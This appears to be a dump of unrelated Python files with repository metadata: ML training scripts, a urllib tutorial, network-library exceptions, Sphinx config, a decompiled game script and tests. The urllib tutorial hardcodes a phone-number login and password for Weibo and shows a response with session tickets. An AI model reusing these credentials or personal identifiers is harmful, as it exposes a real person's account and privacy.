memory_size=memory_size, num_buffer=num_buffer,
# Below is QAgent params
actions=actions, alpha=alpha, gamma=gamma,
explore_strategy=explore_strategy, epsilon=epsilon,
verbose=2)
c = QController(agent=agent)
emu = Emulation(te=te, ts=ts, c=c, beta=beta)
# Heavyliftings
t = time.time()
sys.stdout = sys_stdout
log_path = project_dir + '/sleep_control/experiments/log/'
if os.path.isfile(log_path+log_file_name):
print "Log file {} already exist. Experiment cancelled.".format(log_file_name)
else:
log_file = open(log_path+log_file_name,"w")
print log_file_name + datetime.now().strftime(' [%Y-%m-%d %H:%M:%S] ') + '00%'
time.sleep(1)
sys.stdout = log_file
while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS:
# log time
print "Epoch {},".format(emu.epoch),
left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step
right = left + emu.te.time_step
print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S"))
emu.step()
print
if emu.epoch%(0.1*TOTAL_EPOCHS)==0:
sys.stdout = sys_stdout
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S] ')+'{}0%'.format(10*emu.epoch/TOTAL_EPOCHS)
time.sleep(1)
sys.stdout = log_file
sys.stdout = sys_stdout
log_file.close()
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{:.3f} sec,'.format(time.time()-t),
print '{:.3f} min'.format((time.time()-t)/60)
|
[
"liujingchu@gmail.com"
] |
liujingchu@gmail.com
|
8ff0c8e47e574a3a1e3a5c08bcb4cd992a48c23a
|
7fbf91c595f3adb67e29ab879a0b215581d260bf
|
/知识点/04-LiaoXueFeng-master/55-urllib.py
|
f613e42c3282f9ecbfdeb46685e8f672b48fb8c8
|
[] |
no_license
|
Randyedu/python
|
69947b3836e62d0081d92591ae2acd9a54eadb9a
|
5f9e7bec295ae05eadde0f661e7039c2bd08f725
|
refs/heads/master
| 2021-04-26T22:20:22.555128
| 2018-03-02T07:01:27
| 2018-03-02T07:01:27
| 124,074,741
| 1
| 0
| null | 2018-03-06T12:23:42
| 2018-03-06T12:23:42
| null |
UTF-8
|
Python
| false
| false
| 4,701
|
py
|
'''
urllib
urllib提供了一系列用于操作URL的功能。
urllib提供的功能就是利用程序去执行各种HTTP请求。如果要模拟浏览器完成特定功能,需要把请求伪装成浏览器。伪装的方法是先监控浏览器发出的请求,再根据浏览器的请求头来伪装,User-Agent头就是用来标识浏览器的。
'''
'''
Get
urllib的request模块可以非常方便地抓取URL内容,也就是发送一个GET请求到指定的页面,然后返回HTTP的响应:
'''
'''
# 对网页进行抓取,并返回响应:
from urllib import request
url = 'https://api.douban.com/v2/book/2129650'
with request.urlopen(url) as f:
data = f.read()
print('Status:', f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(data.decode('utf-8'))
'''
print('----模拟浏览器发送GET请求----')
'''
如果我们要想模拟浏览器发送GET请求,就需要使用Request对象.
通过往Request对象添加HTTP头,我们就可以把请求伪装成浏览器。
例如,模拟iPhone 6去请求豆瓣首页:
'''
from urllib import request
'''
url = 'http://www.douban.com/'
req = request.Request(url)
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
print('status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(f.read().decode('utf-8'))
'''
print('----以POST发送一个请求----')
'''
Post
如果要以POST发送一个请求,只需要把参数data以bytes形式传入。
'''
# 我们模拟一个微博登录,先读取登录的邮箱和口令,然后按照weibo.cn的登录页的格式以username=xxx&password=xxx的编码传入:
from urllib import request,parse
print('Login to weibo.cn...')
email = '18767162147'
passwd = '123456'
login_data = parse.urlencode([
('username',email),
('password',passwd),
('entry','mweibo'),
('client_id',''),
('savestate','1'),
('ec',''),
('pagerefer','https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print('Data:',f.read().decode('utf-8'))
'''
Login to weibo.cn...
Status: 200 OK
Server:nginx/1.2.0
Date:Wed, 18 Nov 2015 01:17:48 GMT
Content-Type:text/html
Transfer-Encoding:chunked
Connection:close
Vary:Accept-Encoding
Cache-Control:no-cache, must-revalidate
Expires:Sat, 26 Jul 1997 05:00:00 GMT
Pragma:no-cache
Access-Control-Allow-Origin:https://passport.weibo.cn
Access-Control-Allow-Credentials:true
DPOOL_HEADER:dryad45
SINA-LB:aGEuOTAuZzEucXhnLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZGNjYTk0Y2UgMCAwIDAgNCA0ODAK
登录成功:
Data: {"retcode":20000000,"msg":"","data":{"loginresulturl":"https:\/\/passport.weibo.com\/sso\/crossdomain?entry=mweibo&action=login&proj=1&ticket=ST-MTk1NTAzMjcxNw%3D%3D-1447809422-gz-2C1D9275A244AFBEC6C3994B7615CBE0&display=0&cdurl=https%3A%2F%2Flogin.sina.com.cn%2Fsso%2Fcrossdomain%3Fentry%3Dmweibo%26action%3Dlogin%26proj%3D1%26ticket%3DST-MTk1NTAzMjcxNw%253D%253D-1447809422-gz-FE1989D8F7BC5227D9D27A1379670EF5%26display%3D0%26cdurl%3Dhttps%253A%252F%252Fpassport.sina.cn%252Fsso%252Fcrossdomain%253Fentry%253Dmweibo%2526action%253Dlogin%2526display%253D0%2526ticket%253DST-MTk1NTAzMjcxNw%25253D%25253D-1447809422-gz-057CDD10C8F2E7EB8E9797ADB86B4477","uid":"1955032717"}}
登录失败:
Data: {"retcode":50011002,"msg":"\u7528\u6237\u540d\u6216\u5bc6\u7801\u9519\u8bef","data":{"im":1,"username":"18767162147","errline":604}}
'''
'''
Handler
如果还需要更复杂的控制,比如通过一个Proxy(代理服务器)去访问网站,我们需要利用ProxyHandler来处理
'''
import urllib.request
proxy_handler = urllib.request.ProxyHandler({'http':'http://www.example.com:3128/'})
proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm','host','username','password')
opener = urllib.request.build_opener(proxy_handler,proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
pass
|
[
"954950195@qq.com"
] |
954950195@qq.com
|
09ea107626a3b50a80e9b2624651b464bff260df
|
162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d
|
/examples/ensemble/plot_gradient_boosting_regularization.py
|
30116b2be102df536f491dab433fc757a2c46506
|
[] |
no_license
|
testsleeekGithub/trex
|
2af21fa95f9372f153dbe91941a93937480f4e2f
|
9d27a9b44d814ede3996a37365d63814214260ae
|
refs/heads/master
| 2020-08-01T11:47:43.926750
| 2019-11-06T06:47:19
| 2019-11-06T06:47:19
| 210,987,245
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,842
|
py
|
"""
================================
Gradient Boosting regularization
================================
Illustration of the effect of different regularization strategies
for Gradient Boosting. The example is taken from Hastie et al 2009 [1]_.
The loss function used is binomial deviance. Regularization via
shrinkage (``learning_rate < 1.0``) improves performance considerably.
In combination with shrinkage, stochastic gradient boosting
(``subsample < 1.0``) can produce more accurate models by reducing the
variance via bagging.
Subsampling without shrinkage usually does poorly.
Another strategy to reduce the variance is by subsampling the features
analogous to the random splits in Random Forests
(via the ``max_features`` parameter).
.. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical
Learning Ed. 2", Springer, 2009.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from mrex import ensemble
from mrex import datasets
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X = X.astype(np.float32)
# map labels from {-1, 1} to {0, 1}
labels, y = np.unique(y, return_inverse=True)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
original_params = {'n_estimators': 1000, 'max_leaf_nodes': 4, 'max_depth': None, 'random_state': 2,
'min_samples_split': 5}
plt.figure()
for label, color, setting in [('No shrinkage', 'orange',
{'learning_rate': 1.0, 'subsample': 1.0}),
('learning_rate=0.1', 'turquoise',
{'learning_rate': 0.1, 'subsample': 1.0}),
('subsample=0.5', 'blue',
{'learning_rate': 1.0, 'subsample': 0.5}),
('learning_rate=0.1, subsample=0.5', 'gray',
{'learning_rate': 0.1, 'subsample': 0.5}),
('learning_rate=0.1, max_features=2', 'magenta',
{'learning_rate': 0.1, 'max_features': 2})]:
params = dict(original_params)
params.update(setting)
clf = ensemble.GradientBoostingClassifier(**params)
clf.fit(X_train, y_train)
# compute test set deviance
test_deviance = np.zeros((params['n_estimators'],), dtype=np.float64)
for i, y_pred in enumerate(clf.staged_decision_function(X_test)):
# clf.loss_ assumes that y_test[i] in {0, 1}
test_deviance[i] = clf.loss_(y_test, y_pred)
plt.plot((np.arange(test_deviance.shape[0]) + 1)[::5], test_deviance[::5],
'-', color=color, label=label)
plt.legend(loc='upper left')
plt.xlabel('Boosting Iterations')
plt.ylabel('Test Set Deviance')
plt.show()
|
[
"shkolanovaya@gmail.com"
] |
shkolanovaya@gmail.com
|
2c1206ff3140a312e6079a06ddf7380a15553501
|
009c1088e42cd50591946f736c30c0bad6db851b
|
/netmiko/ssh_exception.py
|
ad9e728ba282388faa4e5286d0a8f5df8748ee36
|
[
"MIT"
] |
permissive
|
hellt/netmiko
|
812501b0651db920ac07e09132651eee7bdd4794
|
f7ff5e6278acaecff7583518cc97bd945fceddc3
|
refs/heads/master
| 2021-01-18T12:45:01.751466
| 2016-11-18T23:30:44
| 2016-11-18T23:30:44
| 38,681,423
| 2
| 0
| null | 2015-07-07T10:44:21
| 2015-07-07T10:44:20
|
Python
|
UTF-8
|
Python
| false
| false
| 380
|
py
|
from paramiko.ssh_exception import SSHException
from paramiko.ssh_exception import AuthenticationException
class NetMikoTimeoutException(SSHException):
"""SSH session timed trying to connect to the device."""
pass
class NetMikoAuthenticationException(AuthenticationException):
"""SSH authentication exception based on Paramiko AuthenticationException."""
pass
|
[
"ktbyers@twb-tech.com"
] |
ktbyers@twb-tech.com
|
115a5f4de9b5a815764712b22925f2dff071cb0c
|
acef5161a1eeb107b116f9763114bb9f77d701b4
|
/pytorch/深度学习之PyTorch入门/廖星宇教程/14_googlenet.py
|
92ed042f6f1974bc2acbf433b857c3b0917fb789
|
[] |
no_license
|
lingxiao00/PyTorch_Tutorials
|
aadb68582edbaa093ab200724c670b36763156b7
|
285bcfb0c60860e47343485daeb54947cd715f97
|
refs/heads/master
| 2021-10-20T16:56:21.275740
| 2019-03-01T02:46:42
| 2019-03-01T02:46:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,188
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-12-25 09:07:53
# @Author : cdl (1217096231@qq.com)
# @Link : https://github.com/cdlwhm1217096231/python3_spider
# @Version : $Id$
import torch
import torchvision
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision.datasets import CIFAR10
import torchvision.transforms as tfs
import numpy as np
from utils import train
import torch.nn as nn
import sys
sys.path.append("..")
"""inception模块"""
# 定义一个卷积和一个relu激活函数和一个batchnorm作为一个基本的层结构
def conv_relu(in_channel, out_channel, kernel, stride=1, padding=0):
layer = nn.Sequential(
nn.Conv2d(in_channel, out_channel, kernel, stride, padding),
nn.BatchNorm2d(out_channel, eps=1e-3),
nn.ReLU(True),
)
return layer
# inception模块
class inception(nn.Module):
def __init__(self, in_channel, out1_1, out2_1, out2_3, out3_1, out3_5, out4_1):
super(inception, self).__init__()
# 第一条线路
self.branch1x1 = conv_relu(in_channel, out1_1, 1)
# 第二条线路
self.branch3x3 = nn.Sequential(
conv_relu(in_channel, out2_1, 1),
conv_relu(out2_1, out2_3, 3, padding=1)
)
# 第三条线路
self.branch5x5 = nn.Sequential(
conv_relu(in_channel, out3_1, 1),
conv_relu(out3_1, out3_5, 5, padding=2)
)
# 第四条线路
self.branch_pool = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
conv_relu(in_channel, out4_1, 1)
)
def forward(self, x):
f1 = self.branch1x1(x)
f2 = self.branch3x3(x)
f3 = self.branch5x5(x)
f4 = self.branch_pool(x)
output = torch.cat((f1, f2, f3, f4), dim=1)
return output
test_net = inception(3, 64, 48, 64, 64, 96, 32)
test_x = Variable(torch.zeros(1, 3, 96, 96))
print('input shape: {} x {} x {}'.format(
test_x.shape[1], test_x.shape[2], test_x.shape[3]))
test_y = test_net(test_x)
print('output shape: {} x {} x {}'.format(
test_y.shape[1], test_y.shape[2], test_y.shape[3]))
# 定义googlenet网络
class googlenet(nn.Module):
def __init__(self, in_channel, num_classes, verbose=False):
super(googlenet, self).__init__()
self.verbose = verbose
self.block1 = nn.Sequential(
conv_relu(in_channel, out_channel=64,
kernel=7, stride=2, padding=3),
nn.MaxPool2d(3, 2)
)
self.block2 = nn.Sequential(
conv_relu(64, 64, kernel=1),
conv_relu(64, 192, kernel=3, padding=1),
nn.MaxPool2d(3, 2)
)
self.block3 = nn.Sequential(
inception(192, 64, 96, 128, 16, 32, 32),
inception(256, 128, 128, 192, 32, 96, 64),
nn.MaxPool2d(3, 2)
)
self.block4 = nn.Sequential(
inception(480, 192, 96, 208, 16, 48, 64),
inception(512, 160, 112, 224, 24, 64, 64),
inception(512, 128, 128, 256, 24, 64, 64),
inception(512, 112, 144, 288, 32, 64, 64),
inception(528, 256, 160, 320, 32, 128, 128),
nn.MaxPool2d(3, 2)
)
self.block5 = nn.Sequential(
inception(832, 256, 160, 320, 32, 128, 128),
inception(832, 384, 182, 384, 48, 128, 128),
nn.AvgPool2d(2)
)
self.classifier = nn.Linear(1024, num_classes)
def forward(self, x):
x = self.block1(x)
if self.verbose:
print('block 1 output: {}'.format(x.shape))
x = self.block2(x)
if self.verbose:
print('block 2 output: {}'.format(x.shape))
x = self.block3(x)
if self.verbose:
print('block 3 output: {}'.format(x.shape))
x = self.block4(x)
if self.verbose:
print('block 4 output: {}'.format(x.shape))
x = self.block5(x)
if self.verbose:
print('block 5 output: {}'.format(x.shape))
x = x.view(x.shape[0], -1)
x = self.classifier(x)
return x
test_net = googlenet(3, 10, True)
test_x = Variable(torch.zeros(1, 3, 96, 96)) # (bs, n_c, n_h, n_w)
test_y = test_net(test_x)
print('output: {}'.format(test_y.shape))
# 数据预处理
def data_tf(x):
x = x.resize((96, 96), 2)
x = np.array(x, dtype="float32") / 255
x = (x - 0.5) / 0.5
x = x.transpose((2, 0, 1)) # 将channel放在第一个维度上
x = torch.from_numpy(x)
return x
# 数据预处理得到训练数据和测试数据
train_set = CIFAR10(root="./datasets/", train=True, transform=data_tf)
train_data = torch.utils.data.DataLoader(
train_set, batch_size=64, shuffle=True)
test_set = CIFAR10(root="./datasets/", train=False, transform=data_tf)
test_data = torch.utils.data.DataLoader(
test_set, batch_size=128, shuffle=False)
# 定义优化算法和损失函数
net = googlenet(3, 10)
optimizer = torch.optim.SGD(net.parameters(), lr=0.01)
loss_func = nn.CrossEntropyLoss()
# 训练网络
# train(net, train_data, test_data, num_epochs=20, optimizer, loss_func)
|
[
"1217096231@qq.com"
] |
1217096231@qq.com
|
1d32e1151eba68baf6a8345f309bbe74e4e2f45e
|
3cb59da879c7865dd6ddb246b7ea92d5a71cb838
|
/documentation/book/src/conf.py
|
da1eca7ba63789d464e1cc8f1721a2ecc13e5f7b
|
[] |
no_license
|
iNarcissuss/Cuckoodroid-1
|
9110be112f45327ffe8a74b2216fe8ad6a153485
|
0170c52aa9536ffc5b8391190dec892c9bd7ba0b
|
refs/heads/master
| 2020-04-07T08:53:28.011215
| 2018-06-17T22:25:29
| 2018-06-17T22:30:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,078
|
py
|
# -*- coding: utf-8 -*-
#
# Cuckoo Sandbox documentation build configuration file.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'CuckooDroid'
copyright = u'2014-2015, Checkpoint Software Technologies'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = en
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "%s v%s Book" % (project, version)
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "_images/logo/cuckoo.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = False
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'CuckooSandboxdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'CuckooSandbox.tex', u'Cuckoo Sandbox Book',
u'Cuckoo Sandbox', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cuckoosandbox', u'Cuckoo Sandbox Book',
[u'Cuckoo Sandbox'], 1)
]
|
[
"upgautam@ualr.edu"
] |
upgautam@ualr.edu
|
9e204b2a44c4a6faeafac15f08663c30bceeb24e
|
53784d3746eccb6d8fca540be9087a12f3713d1c
|
/res/packages/scripts/scripts/client/gui/prb_control/entities/random/squad/actions_handler.py
|
5f596563a646d6a33336b7a766a43818fd80f3e2
|
[] |
no_license
|
webiumsk/WOT-0.9.17.1-CT
|
736666d53cbd0da6745b970e90a8bac6ea80813d
|
d7c3cf340ae40318933e7205bf9a17c7e53bac52
|
refs/heads/master
| 2021-01-09T06:00:33.898009
| 2017-02-03T21:40:17
| 2017-02-03T21:40:17
| 80,870,824
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 3,310
|
py
|
# 2017.02.03 21:48:45 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/prb_control/entities/random/squad/actions_handler.py
from CurrentVehicle import g_currentVehicle
from constants import MIN_VEHICLE_LEVEL, MAX_VEHICLE_LEVEL
from gui import DialogsInterface
from gui.Scaleform.daapi.view.dialogs import I18nConfirmDialogMeta
from gui.prb_control.entities.base.squad.actions_handler import SquadActionsHandler
class RandomSquadActionsHandler(SquadActionsHandler):
"""
Random squad actions handler
"""
pass
class BalancedSquadActionsHandler(RandomSquadActionsHandler):
"""
Random balanced squad actions handler
"""
def execute(self):
if self._entity.isCommander():
func = self._entity
fullData = func.getUnitFullData(unitIdx=self._entity.getUnitIdx())
notReadyCount = 0
for slot in fullData.slotsIterator:
slotPlayer = slot.player
if slotPlayer:
if slotPlayer.isInArena() or fullData.playerInfo.isInSearch() or fullData.playerInfo.isInQueue():
DialogsInterface.showI18nInfoDialog('squadHavePlayersInBattle', lambda result: None)
return True
if not slotPlayer.isReady:
notReadyCount += 1
if not fullData.playerInfo.isReady:
notReadyCount -= 1
if fullData.stats.occupiedSlotsCount == 1:
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNoPlayers'), self._confirmCallback)
return True
if notReadyCount > 0:
if notReadyCount == 1:
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNotReadyPlayer'), self._confirmCallback)
return True
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNotReadyPlayers'), self._confirmCallback)
return True
if not g_currentVehicle.isLocked():
_, unit = self._entity.getUnit()
playerVehicles = unit.getVehicles()
if playerVehicles:
commanderLevel = g_currentVehicle.item.level
lowerBound, upperBound = self._entity.getSquadLevelBounds()
minLevel = max(MIN_VEHICLE_LEVEL, commanderLevel + lowerBound)
maxLevel = min(MAX_VEHICLE_LEVEL, commanderLevel + upperBound)
levelRange = range(minLevel, maxLevel + 1)
for _, unitVehicles in playerVehicles.iteritems():
for vehicle in unitVehicles:
if vehicle.vehLevel not in levelRange:
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNoPlayers'), self._confirmCallback)
return True
self._setCreatorReady()
else:
self._entity.togglePlayerReadyAction(True)
return True
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\gui\prb_control\entities\random\squad\actions_handler.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:48:45 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
94f99e7b82a5ec22f9c330c1c3424c80ddffd340
|
68cf7c25bb614883c50d21e5051fbea8dbf18ccb
|
/ecommercejockey/premier/migrations/0004_premiermanufacturer_is_relevant.py
|
7fffb9a4c92c2468f267399e76f0273e040662dc
|
[
"MIT"
] |
permissive
|
anniethiessen/ecommerce-jockey
|
63bf5af6212a46742dee98d816d0bc2cdb411708
|
9268b72553845a4650cdfe7c88b398db3cf92258
|
refs/heads/master
| 2022-12-14T02:29:25.140796
| 2021-05-15T01:20:30
| 2021-05-15T01:20:30
| 211,400,595
| 1
| 1
|
MIT
| 2022-12-08T06:45:40
| 2019-09-27T20:57:19
|
Python
|
UTF-8
|
Python
| false
| false
| 420
|
py
|
# Generated by Django 2.2.5 on 2019-10-24 21:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('premier', '0003_premierproduct_vendor_part_number'),
]
operations = [
migrations.AddField(
model_name='premiermanufacturer',
name='is_relevant',
field=models.BooleanField(default=False),
),
]
|
[
"anniethiessen79@gmail.com"
] |
anniethiessen79@gmail.com
|
91ee91326e2c26dfbfda3d24dd84086ee64b226b
|
bfc25f1ad7bfe061b57cfab82aba9d0af1453491
|
/data/external/repositories/124701/kaggle-bike-sharing-demand-master/support_vector_regression.py
|
759c9ec148be5704e863f8be68bcb9bf1a95db7a
|
[
"MIT"
] |
permissive
|
Keesiu/meta-kaggle
|
77d134620ebce530d183467202cf45639d9c6ff2
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
refs/heads/master
| 2020-03-28T00:23:10.584151
| 2018-12-20T19:09:50
| 2018-12-20T19:09:50
| 147,406,338
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,644
|
py
|
# Kaggle Bike Sharing Demand
# Joey L. Maalouf
# Approach: Support Vector Regression
# -- import any necessary modules ----------------------------------------------
import csv
from sklearn.svm import SVR
# from sklearn.grid_search import GridSearchCV
# -- define our functions ------------------------------------------------------
def to_int(input):
try:
return int(input)
except TypeError:
return [int(input[0]), int(input[1])]
def read_data(filename, xy):
datalist = []
# read in the file
data = open(filename)
reader = csv.reader(data, delimiter=",")
for row in reader:
if (xy == "x"):
# store just the hour and weather
datalist.append([row[0][11:13], row[4]])
elif (xy == "y"):
# store just the count
datalist.append(row[11])
elif (xy == "xx"):
datalist.append(row[0])
return datalist[1:] if xy == "xx" else [to_int(i) for i in datalist[1:]]
# -- read in the data ----------------------------------------------------------
print("Let's start reading in the data...")
x_train = read_data("train.csv", "x")
y_train = read_data("train.csv", "y")
x_test = read_data("test.csv", "x")
print("Finished reading in the data!\n")
# -- fit regression model ------------------------------------------------------
print("Let's start instantiating our model...")
# parameters = \
# [
# {
# "kernel": ["rbf"],
# "C": [1e3, 1e2, 1e1],
# "gamma": [1e0, 1e-1, 1e-2, 1e-3]
# },
# {
# "kernel": ["poly"],
# "C": [1e3, 1e2, 1e1],
# "gamma": [1e0, 1e-1, 1e-2, 1e-3],
# "degree": [2, 3, 4]
# }
# ]
# svr = GridSearchCV(SVR(), parameters)
svr = SVR(kernel="rbf", C=1000, gamma=0.1)
print("Finished instantiating our model!\n")
print("Let's start training our model...")
model = svr.fit(x_train, y_train)
print("Finished training our model!\n")
print("Let's start predicting our new data...")
y_test = model.predict(x_test)
print("Finished predicting our new data!\n")
# print("\nBest estimator:")
# print(svr.best_estimator_)
# print("\nBest parameters:")
# print(svr.best_params_)
# print("\nScorer:")
# print(svr.scorer_)
# print("\nGrid scores:")
# for s in svr.grid_scores_:
# print(s)
# -- output the results --------------------------------------------------------
datetime = read_data("test.csv", "xx")
with open("predicted_output_sv.csv", "w") as output:
output.write("datetime,count\n")
for i in range(len(y_test)):
output.write("%s,%d\n" % (datetime[i], y_test[i]))
|
[
"keesiu.wong@gmail.com"
] |
keesiu.wong@gmail.com
|
6b6a068af11269018cfc37811340df981f155484
|
760c354ab910fb9ad5f1ea44221e1dc724f1108b
|
/tests/test_extrusion_stiffness.py
|
8b49218dfee3067009ce6ae4e0e2c5320fc400a6
|
[
"MIT"
] |
permissive
|
yijiangh/assembly_instances
|
dabeafc7c5fc8b8b2b9ce7003ab493ad0f421db8
|
b97a4924d9998b64815c692cada85f4f595e023f
|
refs/heads/master
| 2021-06-13T13:27:27.579912
| 2020-01-30T02:40:51
| 2020-01-30T02:40:51
| 174,738,145
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,286
|
py
|
import os
import pytest
import numpy as np
from pyconmech import StiffnessChecker
@pytest.fixture
def stiffness_tol():
trans_tol = 0.0015
rot_tol = 5 * np.pi / 180
return trans_tol, rot_tol
@pytest.fixture
def known_failure():
return ['klein_bottle_trail.json', 'rotated_dented_cube.json']
def create_stiffness_checker(extrusion_path, trans_tol=0.0015, rot_tol=5*np.pi/180, verbose=False):
# TODO: the stiffness checker likely has a memory leak
if not os.path.exists(extrusion_path):
raise FileNotFoundError(extrusion_path)
checker = StiffnessChecker(json_file_path=extrusion_path, verbose=verbose)
checker.set_self_weight_load(True)
